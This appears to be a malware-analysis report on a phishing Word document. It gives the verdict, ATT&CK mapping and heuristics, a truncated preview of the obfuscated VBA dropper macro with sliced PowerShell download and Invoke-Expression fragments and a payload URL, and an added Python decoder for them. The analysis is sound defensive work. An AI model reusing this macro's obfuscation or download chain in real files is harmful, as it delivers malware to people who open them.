Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying a VBA macro. The heuristics flag an AutoOpen entry point together with a Shell() call, the standard pattern for launching a second-stage payload as soon as the document is opened, and ClamAV's detection name, Img.Dropper.PhishingLure-6443153-0, classifies the file as a phishing lure that drops further content, consistent with the T1566.001 / T1204.002 / T1059.005 chain above. The visible portion of the extracted source (macros.bas) supports this: the module PuPIjATdllmI is padded with junk arithmetic (Rnd, Tan, Oct, Chr, ChrB) under On Error Resume Next, while Mid() calls slice PowerShell fragments out of longer literals. The fragments contain Invoke-Item, a .rEPlAcE() chain that swaps marker strings for a single quote ([Char]39) and a dollar sign ([Char]36), InVoke-eXpressiON, the pieces ownlo and dFi of what is evidently DownloadFile, and a comma-separated list of http:// URLs; the pieces are interleaved with '+' and placeholder tokens such as 2oc and V52 so that no keyword appears contiguously in the source. Two caveats for triage: the only URL the extractor reports, http://schemas.openxmlformats.org/drawingml/2006/main, is a benign OOXML namespace from the document body and not an indicator (the download URLs exist only inside the obfuscated macro strings); and the OLE_LEGACY_WORDBASIC_AUTOEXEC description states that no modern VBA project was recovered, which conflicts with the 71858-byte macros.bas that olevba did extract, so treat that finding as a duplicate of the AutoOpen marker rather than an independent signal.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71858 bytes |

SHA-256 (macros.bas): 97f1ae52f71946c5d71cdb6e7e8d37f872a059e816eec9792fad7f07f869a73a
Script preview (first 1,000 lines of the extracted script; the listing below is truncated):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "PuPIjATdllmI"
Function bRNCUwThwBumV()
On Error Resume Next
ZrIRjuircdC = (ksFQAJrqF - Rnd(43 * Tan(FkTXMwcaaTEfYM)) / jwAdUCF * Oct(cZvzsCPBtKO) * mKVXicpJUJETt / Oct(ULrMlzAIq - Chr(250) + 581 - ChrB(QwkYKSKVKUQVcc)) - 389 + sMwHSVcGihDJhY)
vXXjvzI = (oucQUDXUXkqYhX - Rnd(43 * Tan(RBzzRWpPKWStq)) / VzNZUivirZ * Oct(aljpsiACffPqK) * cwfRuCJ / Oct(BClcwMovmKaK - Chr(250) + 581 - ChrB(kIZSoRqKoFICY)) - 389 + kPNzXdtkiEPjo)
iczAAJnn = (haXwRqIS) + Mid("Mcd+'oc+2oc'+'q2oc+2ocLh2oc+2ocuas2oc+2oc);Inv2oc+2ocoke-Item(kqLhu2oc+2ocas);break;}ca'+'tc2oc+2och'+'{w2oc+2oc'+'rit2oc+2oce'+'-hos2oc+2oct kO81wjwf2KmvSNj98wGjA52V9OMki5CnXi", 4, 140)
YaEtsWKLpz = (rdUXHmrRw - Rnd(43 * Tan(wiIYwwi)) / RtkEAYcop * Oct(qGJdztc) * BEVJAvzFTmTh / Oct(jVuQfjndvvSw - Chr(250) + 581 - ChrB(brtVlPwKziuH)) - 389 + pGvEpVIXGlOMR)
ipEaci = (ZGqXzccciX - Rnd(43 * Tan(lwnSkuVf)) / RBUqczizUOSXla * Oct(INQhWwAlPOsX) * ihKtNfHXm / Oct(uAwiIUF - Chr(250) + 581 - ChrB(AXAKWioIAQQE)) - 389 + kbPOnDYKFSP)
KblYcsjZ = (MwBElXm - Rnd(43 * Tan(zImrjhrGzoOUG)) / JTCHArVrviV * Oct(jGnQXAU) * OEfVIbOBEYAwzh / Oct(iCiXuVHNHVfwl - Chr(250) + 581 - ChrB(jROALPEnj)) - 389 + ZdTnWiWBBRFOtc)
kwifBQmwO = (pJFICMOT) + Mid("JYt8juU02ocbc.T2oc+2oco2oc+2ocStri2o'+'cV52+V52+2ocng(), ZE", 9, 49)
ocwCZvccOj = (NVhXRsRKfs - Rnd(43 * Tan(NYKjFFiqHhYKYi)) / VQjZuFloI * Oct(HliYwtwr) * CqcWTEabHno / Oct(IpBWAdFz - Chr(250) + 581 - ChrB(bjBXwUwSIocTzj)) - 389 + tuNUTddATw)
VmhLij = (bDbPJoSKJbE - Rnd(43 * Tan(UDtIrbN)) / rAiPZcJtaRCP * Oct(nwcimSHHJNv) * VWWnhCHhco / Oct(ZLphfZjsZoZ - Chr(250) + 581 - ChrB(GRaFIGdhnjtD)) - 389 + nFtPuhB)
jkoSscX = (JwzMrKJcdGQ - Rnd(43 * Tan(dRzjhYzYPPKY)) / ZQFTSusjpTiA * Oct(HnmEYrzF) * OcXsaVMPu / Oct(baRtDJLLXBowT - Chr(250) + 581 - ChrB(aQLlKrTYjJCc)) - 389 + ZUXWZYqZhpujvN)
IKtHDDzjoYi = (vjCzPqtjaGazUk) + Mid("StafmXXMbPlAc'+'E(2V52+V52ochKM2oc,2ocLW'+'22oc).rEPlAcE(([Char]117+[Char]65+[Char]75),[sTRINg][CV52+V52har]39).rEPlAcE(2ockqL2oc,[sTRINg][Char]36) MrV52+V52uInVoke-eXpressiONV52)-cRepLACe ([hT", 10, 183)
noAUvt = (VCWwkbiaVWjwpQ - Rnd(43 * Tan(GzwbwGnqSl)) / sTpdiHYikOE * Oct(XivHSNMH) * WknRvGCsh / Oct(DKJjPkrr - Chr(250) + 581 - ChrB(YHfHBoawDw)) - 389 + dFiKViCLjB)
MiEjflBPkF = (fzFjudYrXjSz - Rnd(43 * Tan(ZzTjCWZknMN)) / FjQhaYoRrlzoz * Oct(sOvZtcTwMDaX) * mrwrksup / Oct(IJzHihinzijSdL - Chr(250) + 581 - ChrB(NTkWITMGCNCat)) - 389 + PwDuvGlclwlNY)
CKLonp = (mjJrclcUJz - Rnd(43 * Tan(MjwjwNjhjIYCRd)) / AqMBXbv * Oct(SuAiGQiO) * WvpSCRQiApuNN / Oct(sNXllIIcSRbf - Chr(250) + 581 - ChrB(ziZQzuhfWnmz)) - 389 + vSWlAuENIR)
XNjUBCic = (pCBBzOvjXa) + Mid("qhiilDXMjR6Scwiqo3m0IQwbr9j54http2oc+2oc://www.mba-2oc+2ocin2oc+2o'+'ctensive.2oc+2ocr2ocV52+V52+2ocu/IGV52+V52Dp72oc+2ocW/,2oc+2ocht2oc+2oct2oc+2ocp:V52+V5'+'22o'+'c+2oc//ww2oNPz8cqOnku", 30, 147)
KzvUPmB = (vosIjIi - Rnd(43 * Tan(IXhcvCuub)) / puiijXhE * Oct(kilkuvH) * OVtukPzo / Oct(NTKiirWiXiX - Chr(250) + 581 - ChrB(IUbbFtjWm)) - 389 + horfYiMFfktA)
ImWqFqNHpV = (iKIjfzQwVIG - Rnd(43 * Tan(ViDSNdinAOW)) / nmCfVDWIiDL * Oct(OLJSaCFb) * aWpcYvU / Oct(bZTohstwlaS - Chr(250) + 581 - ChrB(zzSSqDCTLMzI)) - 389 + XNQNCwHBdHdsYh)
BjGhYw = (jzGASSfVO - Rnd(43 * Tan(sblWrCSnR)) / wnTHKMhkr * Oct(HjOQFtZYQuaJV) * IidXdzYbpFS / Oct(izqFluiWKMMVRz - Chr(250) + 581 - ChrB(uXXrpRrwbjK)) - 389 + sTfqJwIO)
DdcAqQ = (OtUCqPGX) + Mid("vWK2adfb1Mocownlo2oc+2oV52+V52ca2oc+2o'+'cdFi2oc+'+a0PjIE3ChzSvC", 11, 41)
jtijN = (QVobnqGdD - Rnd(43 * Tan(lVtBSObLtK)) / djiiLjTqpaR * Oct(jDqYWVFQjM) * RbNALsBjfXonm / Oct(zbGmnNv - Chr(250) + 581 - ChrB(zKwcqFqot)) - 389 + QrRDziIwntmzuP)
QNwSldBWhi = (jiwOquiz - Rnd(43 * Tan(ithOMmBzMv)) / TbinXGptY * Oct(BGmpAjR) * CJXBhiWnNwG / Oct(JbOptFE - Chr(250) + 581 - ChrB(qjElZVcn)) - 389 + YLFkUJmuRtwRks)
iYJwKl = (wbDCiBwqrdsWuo - Rnd(43 * Tan(d
... (truncated)
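The Mid() fragments visible in the preview can be decoded mechanically. The following is an added example written for this page, not code from the report, from oletools or from the sample: it extracts every Mid("...", start, length) call with a regular expression, slices the literal with VBA's 1-based Mid() semantics, and strips the concatenation layer. The mapping of the 2oc and V52 tokens to a single quote is an inference from the fragments (it is what makes the pieces line up into http://, intensive and catch{write-host); the kqL -> $ and uAK -> ' replacements are the ones the sample's own .rEPlAcE() chain declares (assuming PowerShell concatenates [Char]117+[Char]65+[Char]75 to the string uAK) and are applied separately because they belong to a later layer. The input is a constructed sample of five lines copied from the preview above.

```python
"""Decode the Mid()-sliced PowerShell fragments from the macro preview.

Added example for this report page; not code from the report, from oletools
or from the sample. Assumptions are marked below.
"""
import re

# Constructed input: five lines copied from the script preview (one junk
# arithmetic line, four Mid() lines). In practice feed the full olevba output.
VBA_SAMPLE = r"""
ZrIRjuircdC = (ksFQAJrqF - Rnd(43 * Tan(FkTXMwcaaTEfYM)) / jwAdUCF * Oct(cZvzsCPBtKO) * mKVXicpJUJETt / Oct(ULrMlzAIq - Chr(250) + 581 - ChrB(QwkYKSKVKUQVcc)) - 389 + sMwHSVcGihDJhY)
iczAAJnn = (haXwRqIS) + Mid("Mcd+'oc+2oc'+'q2oc+2ocLh2oc+2ocuas2oc+2oc);Inv2oc+2ocoke-Item(kqLhu2oc+2ocas);break;}ca'+'tc2oc+2och'+'{w2oc+2oc'+'rit2oc+2oce'+'-hos2oc+2oct kO81wjwf2KmvSNj98wGjA52V9OMki5CnXi", 4, 140)
IKtHDDzjoYi = (vjCzPqtjaGazUk) + Mid("StafmXXMbPlAc'+'E(2V52+V52ochKM2oc,2ocLW'+'22oc).rEPlAcE(([Char]117+[Char]65+[Char]75),[sTRINg][CV52+V52har]39).rEPlAcE(2ockqL2oc,[sTRINg][Char]36) MrV52+V52uInVoke-eXpressiONV52)-cRepLACe ([hT", 10, 183)
XNjUBCic = (pCBBzOvjXa) + Mid("qhiilDXMjR6Scwiqo3m0IQwbr9j54http2oc+2oc://www.mba-2oc+2ocin2oc+2o'+'ctensive.2oc+2ocr2ocV52+V52+2ocu/IGV52+V52Dp72oc+2ocW/,2oc+2ocht2oc+2oct2oc+2ocp:V52+V5'+'22o'+'c+2oc//ww2oNPz8cqOnku", 30, 147)
DdcAqQ = (OtUCqPGX) + Mid("vWK2adfb1Mocownlo2oc+2oV52+V52ca2oc+2o'+'cdFi2oc+'+a0PjIE3ChzSvC", 11, 41)
"""

# Mid("literal", start, length); the literals in this sample contain no doubled quotes.
MID_CALL = re.compile(r'Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)')

CONCAT = "'+'"                 # PowerShell string-concatenation junk between pieces
QUOTE_TOKENS = ("2oc", "V52")  # ASSUMPTION: placeholders for a single quote, inferred from the fragments
# Declared by the sample's own .rEPlAcE() chain: [Char]117+[Char]65+[Char]75 -> 'uAK'
# (assuming PowerShell char + char yields a string) becomes [Char]39, 'kqL' becomes [Char]36.
INNER_REPLACE = {"uAK": "'", "kqL": "$"}


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start; a start beyond the end yields ''."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid() requires start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def extract_mid_fragments(vba_source: str) -> list[str]:
    """Return the substring each Mid() call evaluates to, in source order."""
    return [vba_mid(lit, int(a), int(b)) for lit, a, b in MID_CALL.findall(vba_source)]


def strip_concat_layer(fragment: str) -> str:
    """Remove '+' junk and quote placeholders until nothing changes.

    A fixpoint loop is needed because the layers nest: '+' is inserted inside
    tokens (2oc+2o'+'c) and tokens inside tokens (2V52+V52oc).
    """
    s = fragment
    while True:
        before = s
        s = s.replace(CONCAT, "")
        for tok in QUOTE_TOKENS:
            s = s.replace(tok, "'")
        s = s.replace(CONCAT, "")
        if s == before:
            return s


def apply_replace_chain(text: str) -> str:
    """Second layer: the replacements the decoded script performs on itself."""
    for marker, ch in INNER_REPLACE.items():
        text = text.replace(marker, ch)
    return text


def decode_all(vba_source: str) -> list[str]:
    """Layer-1 decode of every Mid() fragment found in the VBA source."""
    return [strip_concat_layer(f) for f in extract_mid_fragments(vba_source)]


if __name__ == "__main__":
    for raw, dec in zip(extract_mid_fragments(VBA_SAMPLE), decode_all(VBA_SAMPLE)):
        print(repr(raw))
        print("   ->", repr(dec.replace("http", "hxxp")))  # defanged for display only
```

Running it prints each raw fragment beside its decoded form (http defanged as hxxp on output only). Fragment edges carry half a token (the leading oc and trailing + of the last fragment) because the Mid() start and length cut through the placeholders; the order in which the sample concatenates its variables is not in the preview, so recovering the complete PowerShell command, and the Shell() call that the OLE_VBA_SHELL heuristic fired on, requires the full olevba output.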